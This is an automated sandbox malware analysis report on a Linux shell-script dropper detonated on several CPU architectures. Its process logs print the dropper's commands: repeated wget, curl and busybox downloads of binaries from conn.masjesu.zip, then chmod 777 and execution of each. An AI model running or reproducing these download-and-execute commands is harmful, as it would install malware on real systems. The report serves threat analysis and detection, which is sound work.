Malware Analysis Report

2025-04-03 19:36

Sample ID 241028-b6f85svmdy
Target cd798da264eea2cb34f14ab849c4c0e3.bin
SHA256 7afdd5b7c2a124d5d8b92d6f54dc6432c364c112727f3147183e32d2fe98b286
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

7afdd5b7c2a124d5d8b92d6f54dc6432c364c112727f3147183e32d2fe98b286

Threat Level: Shows suspicious behavior

The file cd798da264eea2cb34f14ab849c4c0e3.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:45

Reported

2024-10-28 01:47

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh

[/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 01:45

Reported

2024-10-28 01:47

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

11s

Command Line

[/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /usr/bin/curl N/A

Processes

/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh

[/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/chmod

[chmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

[./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/rm

[rm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 01:45

Reported

2024-10-28 01:47

Platform

debian9-mipsbe-20240611-en

Max time kernel

74s

Max time network

103s

Command Line

[/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw N/A
N/A /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF N/A
N/A /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB N/A
N/A /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o N/A
N/A /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey N/A
N/A /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod N/A
N/A /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG N/A
N/A /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 N/A
N/A /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq N/A
N/A /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca N/A
N/A /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp N/A
N/A /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n N/A
N/A /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL N/A
N/A /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz N/A
N/A /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp N/A
N/A /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n N/A
N/A /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL N/A
N/A /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz N/A
N/A /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o N/A
N/A /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw N/A
N/A /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF N/A
N/A /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB N/A
N/A /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca N/A
N/A /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey N/A
N/A /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod N/A
N/A /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG N/A
N/A /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 N/A
N/A /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /usr/bin/curl N/A
File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /usr/bin/curl N/A
File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /usr/bin/curl N/A
File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /usr/bin/curl N/A
File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /usr/bin/curl N/A
File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /usr/bin/curl N/A
File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /usr/bin/curl N/A
File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /usr/bin/curl N/A
File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /usr/bin/curl N/A
File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /usr/bin/curl N/A
File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /usr/bin/curl N/A
File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /usr/bin/curl N/A
File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /usr/bin/curl N/A
File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /usr/bin/curl N/A
File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /usr/bin/curl N/A
File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /usr/bin/curl N/A
File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /usr/bin/curl N/A
File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /usr/bin/curl N/A
File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /usr/bin/curl N/A
File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /usr/bin/curl N/A
File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /usr/bin/curl N/A
File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /usr/bin/curl N/A
File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /usr/bin/curl N/A
File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /usr/bin/curl N/A
File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /usr/bin/curl N/A
File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /usr/bin/curl N/A
File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /usr/bin/curl N/A
File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /usr/bin/curl N/A

Processes

/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh

[/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/chmod

[chmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw

[./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/bin/rm

[rm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/chmod

[chmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF

[./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/bin/rm

[rm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/chmod

[chmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB

[./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/bin/rm

[rm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/chmod

[chmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o

[./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/bin/rm

[rm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/chmod

[chmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey

[./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/bin/rm

[rm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/chmod

[chmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod

[./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/bin/rm

[rm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/chmod

[chmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG

[./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/bin/rm

[rm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/chmod

[chmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4

[./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/bin/rm

[rm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/chmod

[chmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq

[./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/bin/rm

[rm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/chmod

[chmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca

[./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/bin/rm

[rm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/chmod

[chmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp

[./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/bin/rm

[rm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/chmod

[chmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n

[./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/bin/rm

[rm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/chmod

[chmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL

[./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/bin/rm

[rm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

/bin/chmod

[chmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz]

